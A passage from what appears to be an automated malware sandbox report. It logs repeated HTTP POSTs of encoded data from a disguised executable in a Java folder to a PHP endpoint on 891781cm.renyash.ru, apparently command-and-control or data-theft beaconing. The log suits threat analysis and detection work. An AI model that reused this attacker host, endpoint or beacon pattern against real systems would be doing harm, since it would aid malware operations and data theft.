                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkVranH6gzNXthlpgFdQ449k7lrUqw2P9aHAaNiifNeTgGrFnYIpJmIVxRKoRNj0REVSsyKZAMRp35O1M1VRBrQDSuyfqNp6EByrDNPmSHMit%2BFb0DVYsjo1Ayhr0ZJLLTGJkAP%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cf49b097d0b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6353&min_rtt=1990&rtt_var=9472&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=39572&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1d 30 15 27 5f 3c 3e 2d 05 2c 2f 34 0e 32 01 08 5e 30 20 23 06 25 07 36 07 2e 16 2b 00 3c 5d 2c 02 32 3a 03 5b 37 0f 0f 02 26 36 2e 5d 04 1d 25 5a 29 5c 3e 16 3f 2f 31 13 28 32 24 58 33 0e 27 58 26 42 23 01 33 3d 32 58 21 0c 06 0b 24 0d 3c 57 28 29 38 03 27 3e 2e 56 21 3a 2e 57 0d 12 22 1d 32 07 3a 0e 2a 31 01 0a 36 05 2c 0d 27 3c 3c 0e 33 3f 20 1f 23 16 3e 10 2a 01 38 5c 35 37 39 51 30 04 09 59 20 3a 25 5b 21 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"0'_<>-,/42^0 #%6.+<],2:[7&6.]%Z)\>?/1(2$X3'X&B#3=2X!$<W()8'>.V!:.W"2:*16,'<<3? #>*8\579Q0Y :%[!"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  73192.168.2.449865104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:03.491189003 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:03.837615013 CET1072OUTData Raw: 55 54 5d 53 5a 5d 51 5b 55 5a 54 59 51 5c 55 55 58 52 5c 5e 59 57 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UT]SZ]Q[UZTYQ\UUXR\^YWR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ )?-4%_%*=-?Z&42U.7$Y$T3'X/.?=,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:03.936372042 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:04.207452059 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bjmUf95jmCxROkYqXGPCTOshuVe2Wwm3tt0PlcqAgOxJKIDttGkPnvzhIxhjM2R1a9sy7DYkJ5iujApvc6Jae8C8zHh6i8tXoRoGNQvCoT%2BNw%2FlWCvKey%2FU5wq8TRRTsqOU3rBbd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cf54bab8c2d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4534&min_rtt=1991&rtt_var=5834&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=65353&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  74192.168.2.449872104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:04.340539932 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:04.696798086 CET1072OUTData Raw: 55 5f 58 51 5a 5c 51 5f 55 5a 54 59 51 58 55 56 58 52 5c 59 59 50 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_XQZ\Q_UZTYQXUVXR\YYPRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +,54;^&1=#Y37=94X3&T&/;^->4\+0R=,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:04.797986984 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:05.398511887 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztl%2Byg%2FrMpqxvBZGBzRSFp3zWb0%2FXKLzcMSxn%2B%2FZ7%2F%2Fl3P6E%2BKz2nFa%2BDYUqIQmUS2fmB5mXtYc9NneTpyIn34LL9QsbkUBhv%2F6fMmd6g2sEHdWcUCSaKo2%2BJ%2F512p6fVyWn%2FaBN"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cfabfc6de9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3515&min_rtt=1465&rtt_var=4650&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=81710&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Jan 1, 2025 15:03:05.485188007 CET14INData Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  75192.168.2.449878104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:05.607769966 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:05.962578058 CET1072OUTData Raw: 55 5e 58 54 5a 5f 54 58 55 5a 54 59 51 52 55 54 58 5e 5c 54 59 54 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^XTZ_TXUZTYQRUTX^\TYTRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <]#Z$>5==3&7"9'(X$/2T'^/X(Z<X$)#^!'^)
                                                                                                                  Jan 1, 2025 15:03:06.051875114 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:06.321315050 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:06 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkp4X3s3Jqgoob%2F3JQapzKm%2BQJ0JLZbyI33t1GiMxc59fRRKR9MYmznlyb9ItXqY8t7UIo48ARtPy%2BqIRi%2BWVIdpShJYtG2hUqKWFmLvtkTMOCQrx3YZmoxbigXfG3zXe%2BAb5xox"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d028cf94386-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1705&rtt_var=1254&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=350456&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  76192.168.2.449887104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:06.449063063 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:06.806524038 CET1072OUTData Raw: 55 5f 58 51 5a 5c 51 5e 55 5a 54 59 51 5c 55 55 58 5c 5c 5f 59 5d 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_XQZ\Q^UZTYQ\UUX\\_Y]RX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ )?\ ]:&*=734W:'<X$?*W&/'^/>\<>0)#^!'^)
                                                                                                                  Jan 1, 2025 15:03:06.913144112 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:07.164849043 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zNtvG60XiYlZW8sXBJ3nCnPLDxbO0iZE4YaJDnWxGotajRR%2B0eHyHkXQPO0opLdRKhCVHRkq66OIijaJqiVYjrsnqZ8QHD5OqCXf6mlU3o254KYnM5Ye3cPaNiCGTwY6cc8rxR5Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d07efefc44f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3495&min_rtt=1521&rtt_var=4518&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=84329&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  77192.168.2.449893104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:07.294213057 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:07.649972916 CET1072OUTData Raw: 50 56 58 5c 5a 59 54 59 55 5a 54 59 51 5d 55 57 58 58 5c 5e 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVX\ZYTYUZTYQ]UWXX\^YQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+?=]#(9X%>>3$%-,0?.$,<,+>#^!'^)?
                                                                                                                  Jan 1, 2025 15:03:07.777196884 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:08.043083906 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Vn3gIUngjyKwhYn4EMB%2FxqogT1klcv51jjvVcZa%2FhxMlostpwhzh%2BKI%2FbwL4wT412epeT8p0LnUyFiNWuHhZXIyTKvOgibcPVA2owd%2BD9RzhyTQak374h4mwcNGx%2B6MNHJiENJk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d0d4a2c0cc4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3016&min_rtt=1564&rtt_var=3490&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=110773&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  78192.168.2.449899104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:08.169076920 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:08.524950027 CET1072OUTData Raw: 55 52 58 53 5a 5f 54 58 55 5a 54 59 51 5c 55 56 58 5c 5c 5d 59 53 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: URXSZ_TXUZTYQ\UVX\\]YSR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^(5489Z%.5\)+Z'$>U98%/6Q'/<,.<[+=#^!'^)
                                                                                                                  Jan 1, 2025 15:03:08.654587030 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:08.931304932 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KMwR%2FLx17u3m%2BJNJeGfftjJKDFkc%2Bs0clDYycY5GS5vzVVkiJYaic7NvnMSxruvXVJ3wcH2jbANCOyFlJsc0jePOSwJP9b%2BH%2FDbTHKeT2TRtcGZm5ALdKKU%2B8drPS%2FEfSdvCOKV9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d12cc720fa4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4584&min_rtt=1653&rtt_var=6482&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=58158&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  79192.168.2.449906104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:09.059232950 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  80192.168.2.449907104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:09.113622904 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:09.462626934 CET1796OUTData Raw: 50 52 58 52 5a 5b 54 5d 55 5a 54 59 51 58 55 55 58 58 5c 5c 59 53 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXRZ[T]UZTYQXUUXX\\YSR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/-Z48.%=)])-<02T:0,!''Y,'<X =#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:09.593059063 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:09.767405987 CET959INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVS0F22oF%2FT103FRF9Yy%2BcwkzHFr8drUeJacaTaWB%2F7GLvfL44cysYg3ChW6c%2BTWzTHIOMQdicYNY7fD7f94CWFtxTS%2By%2FW6usH53HHHT40I3T2IxzN1SDw6kR0kH75OuInuEEeW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d18a8134213-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7672&min_rtt=5899&rtt_var=5759&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=72676&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1d 27 02 27 5c 2b 10 3d 01 2c 2f 28 0f 32 3f 04 59 30 09 2f 06 26 3e 3d 59 3a 38 02 5a 3e 28 2f 59 26 14 03 58 23 21 0f 01 25 26 2e 5d 04 1d 26 01 3d 04 2a 58 3f 2c 35 5e 2a 1c 30 1b 30 37 2f 5d 26 42 20 59 27 13 32 58 36 32 27 53 27 1d 3c 56 3f 39 3b 5b 24 03 2d 0d 21 3a 2e 57 0d 12 22 1c 26 3e 22 0b 28 22 3b 0c 22 02 23 55 24 2c 20 09 24 2c 0e 50 37 38 25 0b 29 2c 30 12 23 37 04 09 30 2a 27 12 35 39 0b 5d 21 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"''\+=,/(2?Y0/&>=Y:8Z>(/Y&X#!%&.]&=*X?,5^*007/]&B Y'2X62'S'<V?9;[$-!:.W"&>"(";"#U$, $,P78%),0#70*'59]!"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  81192.168.2.449908104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:09.232397079 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:09.587450027 CET1072OUTData Raw: 50 51 58 5c 5a 5c 54 5e 55 5a 54 59 51 52 55 54 58 58 5c 54 59 51 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQX\Z\T^UZTYQRUTXX\TYQR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \(4"29\(.'$4-?$<*W&,;[,(><W*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:09.748032093 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:09.915082932 CET819INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBuTePgo9CVd2zSsqryrL%2By%2BYw76sWxj9JRfBWB%2B%2Fd%2FwtUiLA7I%2FFDOTTToIAUn6chOoyCwi%2FYRcMeY%2BGO0nh%2FFQI4ZJ4VU0cwS%2F0AbATBVTiynBhWNslwsNyr4K2CbYXuLjlQAd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d19af9b1861-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
